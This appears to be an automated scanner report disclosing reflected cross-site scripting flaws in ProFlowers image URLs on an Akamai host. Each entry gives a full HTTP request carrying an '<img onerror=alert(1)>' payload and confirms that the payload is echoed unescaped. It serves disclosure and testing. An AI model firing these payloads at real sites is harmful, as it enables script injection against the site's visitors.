GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PFd7a61<img%20src%3da%20onerror%3dalert(1)>2d0b0eab967?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b was submitted in the REST URL parameter 9. This input was echoed as b5539<img src=a onerror=alert(1)>cbd1b68987b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PFb5539<img%20src%3da%20onerror%3dalert(1)>cbd1b68987b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770 was submitted in the REST URL parameter 9. This input was echoed as f2637<img src=a onerror=alert(1)>a8c2691e770 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PFf2637<img%20src%3da%20onerror%3dalert(1)>a8c2691e770?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29 was submitted in the REST URL parameter 9. This input was echoed as 10a2c<img src=a onerror=alert(1)>2c86fed5b29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF10a2c<img%20src%3da%20onerror%3dalert(1)>2c86fed5b29?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7 was submitted in the REST URL parameter 9. This input was echoed as 6a5cf<img src=a onerror=alert(1)>3e463c184e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF6a5cf<img%20src%3da%20onerror%3dalert(1)>3e463c184e7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3 was submitted in the REST URL parameter 9. This input was echoed as b56c4<img src=a onerror=alert(1)>17d73dc25f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PFb56c4<img%20src%3da%20onerror%3dalert(1)>17d73dc25f3?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c was submitted in the REST URL parameter 9. This input was echoed as ab17a<img src=a onerror=alert(1)>cf29162016c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PFab17a<img%20src%3da%20onerror%3dalert(1)>cf29162016c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload db227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2 was submitted in the REST URL parameter 9. This input was echoed as db227<img src=a onerror=alert(1)>38f92df87c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PFdb227<img%20src%3da%20onerror%3dalert(1)>38f92df87c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393 was submitted in the REST URL parameter 9. This input was echoed as 2d1b8<img src=a onerror=alert(1)>9b08ddae393 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF2d1b8<img%20src%3da%20onerror%3dalert(1)>9b08ddae393?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065 was submitted in the REST URL parameter 9. This input was echoed as e5fa6<img src=a onerror=alert(1)>a43e173e065 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PFe5fa6<img%20src%3da%20onerror%3dalert(1)>a43e173e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0 was submitted in the REST URL parameter 9. This input was echoed as 3768b<img src=a onerror=alert(1)>550117928d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF3768b<img%20src%3da%20onerror%3dalert(1)>550117928d0?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2 was submitted in the REST URL parameter 9. This input was echoed as b57ec<img src=a onerror=alert(1)>8ac26b53db2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PFb57ec<img%20src%3da%20onerror%3dalert(1)>8ac26b53db2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea was submitted in the REST URL parameter 9. This input was echoed as 2a5a2<img src=a onerror=alert(1)>220f35153ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF2a5a2<img%20src%3da%20onerror%3dalert(1)>220f35153ea?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9 was submitted in the REST URL parameter 9. This input was echoed as 80316<img src=a onerror=alert(1)>5b91b361cb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF80316<img%20src%3da%20onerror%3dalert(1)>5b91b361cb9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b was submitted in the REST URL parameter 9. This input was echoed as c0749<img src=a onerror=alert(1)>3cf25d69d4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PFc0749<img%20src%3da%20onerror%3dalert(1)>3cf25d69d4b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 65b0f<img%20src%3da%20onerror%3dalert(1)>a549e23adca was submitted in the REST URL parameter 9. This input was echoed as 65b0f<img src=a onerror=alert(1)>a549e23adca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF65b0f<img%20src%3da%20onerror%3dalert(1)>a549e23adca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893 was submitted in the REST URL parameter 9. This input was echoed as 9481e<img src=a onerror=alert(1)>4b0ca80c893 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF9481e<img%20src%3da%20onerror%3dalert(1)>4b0ca80c893?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c was submitted in the REST URL parameter 9. This input was echoed as 4673a<img src=a onerror=alert(1)>c73a060d77c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l4673a<img%20src%3da%20onerror%3dalert(1)>c73a060d77c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 54cfb<img%20src%3da%20onerror%3dalert(1)>0456aff298b was submitted in the REST URL parameter 9. This input was echoed as 54cfb<img src=a onerror=alert(1)>0456aff298b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF54cfb<img%20src%3da%20onerror%3dalert(1)>0456aff298b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f was submitted in the REST URL parameter 9. This input was echoed as c45fd<img src=a onerror=alert(1)>becc4bb494f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PFc45fd<img%20src%3da%20onerror%3dalert(1)>becc4bb494f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6 was submitted in the REST URL parameter 9. This input was echoed as 4e5f4<img src=a onerror=alert(1)>757198edcc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF4e5f4<img%20src%3da%20onerror%3dalert(1)>757198edcc6?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd was submitted in the REST URL parameter 9. This input was echoed as 9397a<img src=a onerror=alert(1)>6dfee76ddd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF9397a<img%20src%3da%20onerror%3dalert(1)>6dfee76ddd?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f5af5<img%20src%3da%20onerror%3dalert(1)>6a39f0929c2 was submitted in the REST URL parameter 9. This input was echoed as f5af5<img src=a onerror=alert(1)>6a39f0929c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PFf5af5<img%20src%3da%20onerror%3dalert(1)>6a39f0929c2?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b was submitted in the REST URL parameter 9. This input was echoed as 3f820<img src=a onerror=alert(1)>765038f592b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
